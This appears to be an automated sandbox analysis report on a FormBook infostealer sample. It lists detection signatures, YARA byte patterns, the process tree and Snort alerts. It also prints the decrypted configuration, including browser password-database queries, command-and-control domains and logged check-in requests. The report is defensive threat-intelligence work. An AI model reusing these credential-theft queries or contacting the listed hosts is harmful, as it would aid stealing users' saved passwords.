Loading ...

Play interactive tourEdit tour

Analysis Report zHgm9k7WYU.exe

Overview

General Information

Sample Name:zHgm9k7WYU.exe
Analysis ID:339322
MD5:d97a26894ec19dc562eec833ccb5607f
SHA1:5aa0632c496d7e1441eef50c61c6a97c5adee565
SHA256:2fdfbfc735f43a4e2dce0c849b41ab83dd17228f6df983f7a95d6e427cdc77b0
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • zHgm9k7WYU.exe (PID: 1928 cmdline: 'C:\Users\user\Desktop\zHgm9k7WYU.exe' MD5: D97A26894EC19DC562EEC833CCB5607F)
    • zHgm9k7WYU.exe (PID: 360 cmdline: {path} MD5: D97A26894EC19DC562EEC833CCB5607F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 4400 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 1688 cmdline: /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d570", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d66e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9b9701d9", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "tknbr.com", "loyaloneconstruction.com", "what-where.com", "matebacapital.com", "marriedandmore.com", "qiemfsolutions.com", "graececonsulting.com", "www7456.com", "littlefreecherokeelibrary.com", "tailgatepawkinglot.com", "musheet.com", "tesfamariamtb.com", "1728025.com", "xceltechuae.com", "harperandchloe.com", "thepamperedbarber.com", "5050alberta.com", "supplychainstrainer.com", "lacorte.group", "ringingbear.com", "dwerux.com", "localeastbay.com", "zhongyier.com", "liamascia.com", "bigdudedesign.com", "agilearccreations.com", "clxkxmk.com", "articlesforthehome.com", "prestiticadalanu.com", "mayanroofingsystems.com", "homeherbgardener.com", "ricardoinman.com", "xrhaoqilai180.xyz", "queromake.com", "holywaterfoundation.com", "modacicekevi.com", "beardeco.com", "universityhysteria.com", "lastguytogetcorona.com", "winton.school", "sanborns.xyz", "bbluebay3dwdshop.com", "mateingseason.com", "oro-iptv.com", "pdlywh.com", "fallgus.com", "dezignercloset.com", "dasarelektronika.info", "cyberparkplace.com", "serenshiningarts.com", "edgecase.pro", "binhminhgarrden.net", "fansofads.com", "fortykorp.com", "shastaestatesseniorliving.com", "raksrecording.com", "mack-soldenfx.com", "freisaq.com", "sesaassociates.com", "calerconsult.com", "sarahpyle.xyz", "threepeninsulas.com", "proficienthomesalesandloans.com", "floridasoapwork.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.theatomicshots.com/xle/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.zHgm9k7WYU.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.zHgm9k7WYU.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.zHgm9k7WYU.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        1.2.zHgm9k7WYU.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.zHgm9k7WYU.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d570", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d66e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9b9701d9", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: zHgm9k7WYU.exeJoe Sandbox ML: detected
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.zHgm9k7WYU.exe.5b0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeUnpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack
          Source: zHgm9k7WYU.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: zHgm9k7WYU.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.574401869.000000000567F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe
          Source: Binary string: explorer.pdb source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1Host: www.ricardoinman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.www7456.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1Host: www.theatomicshots.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.fallgus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1Host: www.bigdudedesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewIP Address: 198.49.23.144 198.49.23.144
          Source: Joe Sandbox ViewIP Address: 198.49.23.144 198.49.23.144
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: C:\Windows\explorer.exeCode function: 2_2_074BC782 getaddrinfo,setsockopt,recv,
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1Host: www.ricardoinman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.www7456.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1Host: www.theatomicshots.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.fallgus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1Host: www.bigdudedesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ricardoinman.com
